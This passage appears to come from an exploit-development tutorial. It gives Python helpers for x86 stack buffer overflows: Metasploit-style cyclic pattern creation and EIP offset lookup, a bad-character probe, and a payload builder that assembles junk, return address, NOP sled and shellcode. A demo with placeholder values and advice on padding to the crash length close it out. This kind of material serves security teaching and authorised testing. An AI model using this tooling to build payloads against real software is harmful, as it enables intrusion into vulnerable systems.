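# Full msf pattern: every (upper, lower, digit) triple, 20280 chars before it repeats.
_FULL_PATTERN = "".join(a + b + c for a, b, c in product(ascii_uppercase, ascii_lowercase, digits))


def pattern_create(length):
    """Same output as pattern_create.rb -l LENGTH (up to one full cycle)."""
    if length > len(_FULL_PATTERN):
        raise ValueError("pattern would repeat; extend the charsets first")
    return _FULL_PATTERN[:length]


def pattern_offset(value):
    """Distance to EIP. `value` is either the 4 pattern chars or the EIP register as
    an int: 0x37614136 -> b'6Aa7', because x86 stores the dword little-endian."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("ascii")
    idx = _FULL_PATTERN.find(value)
    if idx < 0:
        raise ValueError(f"{value!r} is not in the pattern; EIP was not overwritten by it")
    return idx


def badchar_probe(exclude=(0x00,)):
    """Every byte value except the ones already known to be bad. Send it after the
    return address, compare the stack in the debugger, and the byte where the copy
    stops or is mangled is the next bad char; add it to exclude and repeat."""
    return bytes(b for b in range(256) if b not in exclude)


def has_badchars(data, badchars):
    return any(b in badchars for b in data)


def build_payload(offset, ret_addr, shellcode, badchars=(0x00, 0x0a, 0x0d),
                  nop_len=16, total_len=None):
    """junk + EIP + NOP sled + shellcode (+ padding). Raises if the return address
    or the shellcode contains a bad byte, which is where exploits silently die."""
    eip = struct.pack("<I", ret_addr)        # little-endian, same as struct.pack in the scripts
    if has_badchars(eip, badchars):
        raise ValueError(f"return address {ret_addr:#010x} contains a bad character")
    if has_badchars(shellcode, badchars):
        raise ValueError("shellcode contains a bad character; re-encode it")
    payload = b"A" * offset + eip + b"\x90" * nop_len + shellcode
    if total_len is not None:
        if len(payload) > total_len:
            raise ValueError("payload longer than the buffer that crashed")
        payload += b"C" * (total_len - len(payload))   # keep the crash length constant
    return payload


if __name__ == "__main__":
    # constructed scenario: the debugger showed EIP = 0x37614136 after a 3000-byte pattern
    crash = pattern_create(3000)
    off = pattern_offset(0x37614136)
    print(f"EIP overwritten at offset {off} of {len(crash)}")
    demo_sc = b"\xcc" * 4                    # constructed 'shellcode' (int3 breakpoints)
    p = build_payload(off, 0x41414141, demo_sc, total_len=3000)   # constructed address
    print(f"payload {len(p)} bytes, EIP bytes {p[off:off + 4]!r}")
```

Keep total_len equal to the length that produced the crash: a payload that is shorter or longer than the original A-buffer often lands ESP somewhere else, which is the reason the scripts pad with C characters and why a stack adjustment is sometimes needed before the shellcode runs.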